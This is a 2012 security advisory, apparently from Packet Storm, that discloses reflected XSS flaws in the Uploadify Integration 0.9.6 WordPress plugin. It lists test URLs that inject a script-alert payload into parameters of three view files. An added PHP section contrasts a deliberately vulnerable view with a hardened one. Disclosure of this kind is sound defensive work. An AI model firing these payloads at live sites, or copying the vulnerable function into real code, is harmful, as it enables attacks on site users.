Uploadify Integration 0.9.6 Cross Site Scripting

2012-04-10T00:00:00
ID PACKETSTORM:111683
Type packetstorm
Reporter Janek Vind aka waraxe
Modified 2012-04-10T00:00:00

Description

                                        
[waraxe-2012-SA#085] - Reflected XSS in Uploadify Integration Wordpress plugin  
===============================================================================  
  
Author: Janek Vind "waraxe"  
Date: 06. April 2012  
Location: Estonia, Tartu  
Web: http://www.waraxe.us/advisory-85.html  
  
  
Description of vulnerable software:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Uploadify Integration allows you to insert a jQuery uploadify uploader into your  
forms. Features: Uses jQuery Uploadify, Automatically saves to post meta, user  
meta, an option, or temporary depending on the metaType selected by the shortcode.  
Allows more than one shortcode per page.  
  
http://wordpress.org/extend/plugins/uploadify-integration/  
  
  
Vulnerable versions  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Uploadify Integration 0.9.6 is affected; older versions may be affected as well.
  
  
###############################################################################  
1. Reflected XSS vulnerability in "views/scripts/shortcode/index.php"  
###############################################################################  
  
Reason: outputting HTML data without proper encoding
Attack vector: user submitted GET or POST parameters  
Preconditions: "register_globals=On"  
Result: XSS attack possibilities  
  
Tests:  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?buttontext="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?filetypeexts="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?filetypedesc="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?filesizelimit="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?uploadmode="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?metatype="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?parentid="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?path="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?url="><script>alert(String.fromCharCode(88,83,83))</script>  
  
Result: XSS payload execution can be observed  
  
  
###############################################################################  
2. Reflected XSS vulnerability in "views/scripts/partials/file.php"  
###############################################################################  
  
Reason: outputting HTML data without proper encoding
Attack vector: user submitted GET or POST parameters  
Preconditions: "register_globals=On"  
Result: XSS attack possibilities  
  
Tests:  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
partials/file.php?fileid="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
partials/file.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>  
  
Result: XSS payload execution can be observed  
  
  
###############################################################################  
3. Reflected XSS vulnerability in "views/scripts/file/error.php"  
###############################################################################  
  
Reason: outputting HTML data without proper encoding
Attack vector: user submitted GET or POST parameters  
Preconditions: "register_globals=On"  
Result: XSS attack possibilities  
  
Tests:  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
file/error.php?error="><script>alert(String.fromCharCode(88,83,83))</script>  
  
Result: XSS payload execution can be observed  
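
Added example, not part of the original advisory and not the plugin's source: a hypothetical view that shows the pattern behind all three findings (an uninitialised variable printed into an HTML attribute) beside a hardened form. The function names, the markup and the allowed-key list are assumptions; extract() stands in for register_globals=On, which no longer exists in current PHP.

```php
<?php
// Added illustration: hypothetical view code, NOT the plugin's actual source.

// Constructed request, using the probe string from the advisory's test URLs.
$request = ['inputname' => '"><script>alert(String.fromCharCode(88,83,83))</script>'];

// BEFORE: the view prints a variable it never initialised. With
// register_globals=On PHP fills it from GET/POST; extract() stands in for
// that here because register_globals was removed in PHP 5.4.
function render_vulnerable(array $request): string
{
    extract($request);
    return '<input type="file" name="' . $inputname . '" />';
}

// AFTER: the caller passes values explicitly, unknown keys are ignored, and
// every value is HTML-encoded for the attribute context it lands in.
function render_hardened(array $vars): string
{
    $allowed = ['inputname', 'buttontext']; // hypothetical subset of the view's variables
    $safe = [];
    foreach ($allowed as $key) {
        $value = isset($vars[$key]) && is_string($vars[$key]) ? $vars[$key] : '';
        $safe[$key] = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
    }
    return '<input type="file" name="' . $safe['inputname'] . '" />';
}

// Guard for the top of each view script: refuse direct HTTP requests.
// WordPress defines ABSPATH during bootstrap, so it is absent when the file
// is requested by its own URL, as in the advisory's tests. In a real view:
//     if (!defined('ABSPATH')) { exit; }
function is_direct_access(): bool
{
    return !defined('ABSPATH');
}

$bad  = render_vulnerable($request);
$good = render_hardened($request);

echo "vulnerable: $bad\n";
echo "hardened:   $good\n";
echo 'direct access would be refused: ' . (is_direct_access() ? 'yes' : 'no') . "\n";
```

Setting register_globals=Off removes the stated precondition, but the encoding and the direct-access guard are what keep the views safe regardless of server configuration.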
  
  
Contact:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
come2waraxe@yahoo.com  
Janek Vind "waraxe"  
  
Waraxe forum: http://www.waraxe.us/forums.html  
Personal homepage: http://www.janekvind.com/  
Random project: http://albumnow.com/  
---------------------------------- [ EOF ] ------------------------------------  